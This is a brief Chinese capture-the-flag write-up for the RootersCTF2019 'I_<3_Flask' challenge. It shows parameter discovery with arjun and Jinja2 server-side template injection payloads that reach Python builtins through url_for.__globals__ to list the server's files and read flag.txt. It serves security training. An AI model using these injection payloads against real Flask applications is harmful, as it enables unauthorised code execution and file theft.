[RootersCTF2019]I_<3_Flask
突出一个爆破.jpg
除了题目提示flask
之外就没有其他信息了
尝试dirsearch
目录爆破无果,发现一个爆破query
的工具arjun
arjun -u http://xxx.node4.buuoj.cn:81/ -c 100 -d 0.1
/?name=1
/?name={{7*7}}
利用url_for
函数注入
/?name={{url_for.__globals__['__builtins__']['__import__']('os').listdir('.')}}
['flag.txt', 'application.py', 'requirements.txt', 'static', 'templates']
/?name={{url_for.__globals__['__builtins__']['open']('flag.txt').read()}}